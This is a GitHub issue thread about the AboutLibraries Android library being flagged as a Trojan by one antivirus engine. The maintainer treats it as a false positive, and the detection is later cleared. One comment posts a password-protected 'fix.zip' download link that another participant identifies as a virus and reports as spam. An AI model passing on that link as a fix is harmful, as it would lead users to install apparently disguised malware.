### ISSUE TITLE
Library detected as malicious by Sangfor Engine Zero

### ISSUE THREAD

**Issue by papjul** [mikepenz/AboutLibraries#1019]
## About this issue

Since yesterday, this library is detected as Trojan by "Sangfor Engine Zero" as you can see:
- AboutLibrary APK: https://www.virustotal.com/gui/file/8f342ceda3732dd103192063929a0f8187c07126d83c0501609a89753e08a2fe
- Mihon APK: https://www.virustotal.com/gui/file/b23e80aaf26c9cf0ba079e28918c0e28f7a82f79a7bb83d964cf6094698ab47a
- Breezy Weather APK (version that introduced AboutLib dependency): https://www.virustotal.com/gui/file/d8c11bdeaec044ffc7174e30d3fa379bc3de3b9d8aae62b7fadb3a40df18f8f4

You might want to contact their "artificial intelligence" to have more insights/report a false positive. Or you can track down the exact version since it started being detected as "malicious" to see if an external contribution actually added an insecure algorithm or something.

## Details
- [X] Used library version: v11.2.3 (but older versions are also impacted)
- [ ] Used support library version: doesn't matter
- [ ] Used gradle build tools version: doesn't matter
- [ ] Used tooling / Android Studio version: doesn't matter
- [ ] Other used libraries, potential conflicting libraries: doesn't matter

## Checklist

- [X] Searched for [similar issues](https://github.com/mikepenz/AboutLibraries/issues)
- [X] Checked out the [sample application](https://github.com/mikepenz/AboutLibraries/tree/develop/app)
- [X] Read the [README](https://github.com/mikepenz/AboutLibraries/blob/develop/README.md)
- [ ] Checked out the [CHANGELOG](https://github.com/mikepenz/AboutLibraries/releases)
- [ ] Read the [MIGRATION GUIDE](https://github.com/mikepenz/AboutLibraries/blob/develop/MIGRATION.md)

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by papjul** [comment]
Don't download this, it's a virus. I reported the account as spam to GitHub

**Comment by mikepenz** [comment]
I have never heard about `Sangfor Engine Zero`, but I would suggest that this is false, given any checks from more known solutions are not reporting this. 

Wonder if some malicious app used the library and thus resulting now in false positives for other projects. 

---

Please feel free to verify the full source code of the library and all associated dependencies and builds to confirm this project does not contain any malicious code. 

None of the recent external PRs reviewed contained any suspicious code:
- https://github.com/mikepenz/AboutLibraries/pull/1015/files
- https://github.com/mikepenz/AboutLibraries/pull/996/files
- https://github.com/mikepenz/AboutLibraries/pull/967/files
- https://github.com/mikepenz/AboutLibraries/pull/966/files

**Comment by mikepenz** [comment]
Looked at the respective website, they don't appear to have a way to report false positives. And would require me to register on their site for support inquiries. 

If someone has an alternative channel which does not require me to provide my personal information, I'd be happy to learn more about what that check appears to detect.

**Comment by papjul** [comment]
I found this address: [Tech.Support@sangfor.com](mailto:Tech.Support@sangfor.com) on https://www.sangfor.com/support/technical-support if that can help

**Comment by mikepenz** [comment]
Sent an e-mail. Let's see if we get a response.

**Comment by mikepenz** [comment]
Let's see what they will respond. I wonder if their `AI` purely detects the presence of the about libraries meta data file. which was somewhere back then introduced.

**Comment by papjul** [comment]
Looks like it's back in order :)

**Comment by mikepenz** [comment]
You caught that quick :D 

Thanks again for the report, and finding that e-mail!
